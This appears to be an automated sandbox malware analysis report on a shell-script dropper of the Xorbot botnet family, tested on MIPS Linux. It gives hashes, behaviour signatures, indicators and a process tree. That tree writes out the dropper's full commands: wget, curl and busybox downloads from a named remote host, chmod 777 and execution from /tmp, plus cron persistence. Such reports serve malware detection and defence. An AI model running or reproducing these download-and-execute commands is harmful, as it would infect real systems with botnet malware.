Analysis
-
max time kernel
123s -
max time network
152s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/02/2025, 12:35
Static task
static1
Behavioral task
behavioral1
Sample
BZTS9_bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
BZTS9_bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
BZTS9_bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
BZTS9_bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
BZTS9_bins.sh
-
Size
10KB
-
MD5
5f5a8beaeee13fdd7a462ebf3797535c
-
SHA1
982824d6165ed0668b25d6765b631170fc8bbd1d
-
SHA256
d3d3f91578e875f1bf3302e63df0e3d51179d6f4e0c3cdcdc4fd7eef1027fc81
-
SHA512
1569973908da43ee2f414331f4f81ec6106545ec4140272be439351c81bf2e2b27877e9e444c1e7290f195510f59b475de7885999bcc273392e0a0a778b7f01a
-
SSDEEP
96:YokU5Utt6LLnXIEgLsXasZeEINqKqCqE5FJLeOILQAQ8Q8rLNL04hyK1mZEZIZZy:75tgd4t/NYQ3SuaZNnEb7YQ3Su4ZNnY
Malware Config
Signatures
-
resource yara_rule behavioral4/files/fstream-1.dat family_xorbot behavioral4/files/fstream-3.dat family_xorbot -
Xorbot family
-
Contacts a large (1079) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 795 chmod 803 chmod 811 chmod 819 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F 796 BZTS9_bins.sh /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 804 BZTS9_bins.sh /tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X 812 BZTS9_bins.sh /tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY 820 BZTS9_bins.sh -
Renames itself 1 IoCs
pid Process 821 BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /var/spool/cron/crontabs/tmp.vqUCgQ crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for reading /proc/13/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/5/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/966/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/15/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/842/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/957/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/958/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/973/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/6/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/144/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/831/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/838/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/850/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/943/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/166/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/878/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/892/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/662/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/837/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/834/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/886/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/939/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/376/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/940/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/11/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/918/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/955/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/841/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/919/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/969/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/71/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/846/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/856/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/884/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/885/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/900/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/917/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/860/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/964/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/971/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/985/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/852/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/941/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/970/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/974/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/661/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/682/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/947/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/77/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/854/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/879/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/881/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/927/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/980/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/24/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/888/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/948/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/3/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/684/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/858/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/914/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/70/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY File opened for reading /proc/643/cmdline BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY -
System Network Configuration Discovery 1 TTPs 13 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 693 wget 789 curl 799 wget 802 busybox 807 wget 808 curl 816 curl 830 wget 791 busybox 800 curl 810 busybox 815 wget 818 busybox -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F wget File opened for modification /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 curl File opened for modification /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 busybox File opened for modification /tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X wget File opened for modification /tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X curl File opened for modification /tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY curl File opened for modification /tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F curl File opened for modification /tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74 wget File opened for modification /tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY wget
Processes
-
/tmp/BZTS9_bins.sh/tmp/BZTS9_bins.sh1⤵
- Executes dropped EXE
PID:685 -
/bin/rm/bin/rm bins.sh2⤵PID:689
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:693
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:789
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- System Network Configuration Discovery
PID:791
-
-
/bin/chmodchmod 777 coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F./coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵PID:796
-
-
/bin/rmrm coICFqXGGl2s21xpUiwHdrnr46yGHCoa0F2⤵PID:798
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:799
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:800
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:802
-
-
/bin/chmodchmod 777 hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl74./hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵PID:804
-
-
/bin/rmrm hzVfujj1cVttgkMwNDw0PuQ81pOU8UYl742⤵PID:806
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:808
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵
- System Network Configuration Discovery
PID:810
-
-
/bin/chmodchmod 777 6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵
- File and Directory Permissions Modification
PID:811
-
-
/tmp/6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X./6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵PID:812
-
-
/bin/rmrm 6G97IYt8gwxHmuwzdX3XJSZbLwlVZubf0X2⤵PID:814
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY2⤵
- System Network Configuration Discovery
PID:818
-
-
/bin/chmodchmod 777 BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY2⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY./BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY2⤵
- Renames itself
- Reads runtime system information
PID:820 -
/bin/shsh -c "crontab -l"3⤵PID:822
-
/usr/bin/crontabcrontab -l4⤵PID:823
-
-
-
/bin/shsh -c "crontab -"3⤵PID:824
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:825
-
-
-
-
/bin/rmrm BfQqGC02Eeb96LuCc78f7c9YULu8pS25eY2⤵PID:827
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/WBr82G4zo02tl7Bd1MTHjN8uRoW2qv3rGc2⤵
- System Network Configuration Discovery
PID:830
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
127KB
MD589077b7bd4bcafca7713be43635c4862
SHA1fc02edb8fba29ea8ee99e6157ef8560334530052
SHA25678416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d
SHA5121b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1
-
Filesize
210B
MD5a06149a2151be2e4906920c835f303f3
SHA19e381d795ace16c0480d2d80e25f2b4963b43f21
SHA2567eb9349a8a036748c56c5b908adf5e8f18b72bf21d922e29646cca704c00199f
SHA51247dd9f88e0720fe1faecdbe10d37ec4f83db26eb2d1b0c1db82451a3a54dba8098e40b3de84e7586a5cb727edb05a70635fb6728c649c7f63b76558546bbc5c8